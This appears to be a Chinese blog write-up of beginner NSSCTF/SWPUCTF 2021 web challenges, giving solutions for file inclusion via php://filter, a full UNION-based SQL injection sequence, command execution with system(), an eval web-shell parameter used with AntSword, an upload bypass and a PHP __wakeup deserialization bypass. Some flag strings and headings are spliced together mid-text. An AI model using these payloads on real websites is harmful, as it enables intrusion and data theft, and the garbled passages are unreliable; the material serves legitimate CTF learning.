【NSSCTF】web新生赛

06-01 1262阅读

[SWPUCTF 2021 新生赛]include

【NSSCTF】web新生赛 

打开网址之后,需要传入一个file

/?file=php://filter/read=convert.base64-encode/resource=flag.php
  • 先get传个文件,发现flag.php,打开无内容,用yakit试试伪协议,发现base编码 解码获得flag

     

    【NSSCTF】web新生赛

     

    【NSSCTF】web新生赛

    【NSSCTF】web新生赛

    NSSCTF{65d5ab11-315e-4886-b07c-4406137d2a1c}

    [SWPUCTF 2021 新生赛]easy_sql

     

    【NSSCTF】web新生赛

     

    注意闭合和注释

    判断字段:

    ?wllm=-1' order by 3--+

    查看回显点:

    ?wllm=-1' union select 1,2,3--+

    查寻库名:

    ?wllm=-1' union select 1,2,database()--+ //test_db

    查询表明

    ?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+
    //test_tb,users

    查询字段名

    ?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+
    //flag

    查询flag表里面内容

    /?wllm=-1' union select 1,2,group_concat(id,flag) from test_tb--+

     

    【NSSCTF】web新生赛

    [SWPUCTF 2021 新生赛]easyrce

     

    【NSSCTF】web新生赛

    rce 题目,常用的几个系统命令执行函数

    system()

    passthru()

    exec()

    shell_exec()

    popen()

    proc_open()

    pcntl_exec()

    这道题很简单

    http://node5.anna.nssctf.cn:29063/?url=system(%22ls%20/%22);

     

     

    【NSSCTF】web新生赛

     

    【NSSCTF】web新生赛

    [SWPUCTF 2021 新生赛]caidao

     

    【NSSCTF】web新生赛

    打开靶机,发现这一题目是需要传参,然后使用蚁剑链接,查找出flag

    http://node7.anna.nssctf.cn:29158/?wllm=eval($_POST[%27wllm%27]);

     

    【NSSCTF】web新生赛

     

    【NSSCTF】web新生赛

     

    【NSSCTF】web新生赛

    [SWPUCTF 2021 新生赛]ez_unserialize

     

    【NSSCTF】web新生赛

    打开靶机,发现什么都没有,第一反应就是查看源代码

     

    【NSSCTF】web新生赛

    发现了User-agent,就会发现这是一个robots.txt

     

    什么是robots

    Robots 是指网络爬虫,也被称为机器人、搜索引擎蜘蛛等。以下是关于它的详细介绍:

    • 定义与功能:Robots 是一种按照一定的规则,自动抓取互联网上网页信息的程序。它们能够遍历网页链接,收集页面的文本、图片、视频等各种信息,并将这些信息带回搜索引擎的服务器进行处理和索引,以便用户在搜索时能够快速找到相关的网页内容。
    • 工作原理:网络爬虫通常从一些种子网址开始,比如搜索引擎的起始页面或网站地图等。然后,它会根据网页中的链接不断地访问新的页面。在访问每个页面时,它会解析页面的 HTML 代码,提取出有用的信息,如标题、正文、关键词等,并将这些信息存储到数据库中。同时,它也会记录页面中的链接,以便后续继续抓取其他相关页面。
    • Robots 协议:为了规范网络爬虫的行为,互联网上存在一种名为 Robots 协议(也称为机器人排除协议)的标准。网站管理员可以通过在网站根目录下放置一个名为robots.txt的文件,来告知搜索引擎的爬虫哪些页面可以抓取,哪些页面不允许抓取。例如,以下是一个简单的robots.txt文件内容:
      User - Agent: *
      Disallow: /admin/
      Disallow: /private/

       

      【NSSCTF】web新生赛

       

      【NSSCTF】web新生赛

      打开php在线,菜鸟工具,

       
      

      【NSSCTF】web新生赛

       

      【NSSCTF】web新生赛

      NSSCTF{23710dfa-17fe-4cbd-822d-e8a11480908d}

      NSSC[SWPUCTF 2021 新生赛]easyupload1.0TF{23710dfa-17fe-4cbd-822d-e8a1148090

       

      【NSSCTF】web新生赛

      打开靶机,可以看到要上传一个文件,就想到要上传一个图片木马

       

      【NSSCTF】web新生赛

       

      【NSSCTF】web新生赛

      可以观察到上传成功,然后利用抓包软件,yakit进行抓包,随后把后缀名.jpg删除,发现是成功的,然后使用中国蚁剑链接,找到flag

       

      【NSSCTF】web新生赛

      8d}

       

      【NSSCTF】web新生赛

      但是提交不正确,意识到这不是正确的flag,然后回到浏览器,打开hackbar,进行post传参

       

      【NSSCTF】web新生赛

       

      【NSSCTF】web新生赛

      [SWPUCTF 2021 新生赛]PseudoProtocols

       

      【NSSCTF】web新生赛

       

      【NSSCTF】web新生赛

       

      【NSSCTF】web新生赛

      /?a=data://text/plain,I want flag

       

      【NSSCTF】web新生赛

      [SWPUCTF 2021 新生赛]no_wakeup

       

      【NSSCTF】web新生赛

      打开靶机,会发现有???问号,然后打开,可以看到php代码,反序列化,然后放在菜鸟教程的php执行

       
      

      获得反序列代码

       

      【NSSCTF】web新生赛

      O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

      反序列化漏洞:由于代码直接对用户通过 GET 请求传入的参数进行反序列化操作,攻击者可以构造恶意的序列化字符串,利用 __wakeup 或 __destruct 等魔术方法执行任意代码,从而获取服务器的控制权或泄露敏感信息。

      要想办法绕过传参O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

      综上所述,把 2 改为 3 是为了绕过 __wakeup 方法,保证 $passwd 属性的值不被改变,进而成功触发 __destruct 方法中的条件,然后获取flag

      [LitCTF 2023]Follow me and hack meSSCTF{23710dfa-17

免责声明:我们致力于保护作者版权,注重分享,被刊用文章因无法核实真实出处,未能及时与作者取得联系,或有版权异议的,请联系管理员,我们会立即处理! 部分文章是来自自研大数据AI进行生成,内容摘自(百度百科,百度知道,头条百科,中国民法典,刑法,牛津词典,新华词典,汉语词典,国家院校,科普平台)等数据,内容仅供学习参考,不准确地方联系删除处理! 图片声明:本站部分配图来自人工智能系统AI生成,觅知网授权图片,PxHere摄影无版权图库和百度,360,搜狗等多加搜索引擎自动关键词搜索配图,如有侵权的图片,请第一时间联系我们。

相关阅读

目录[+]

取消
微信二维码
微信二维码
支付宝二维码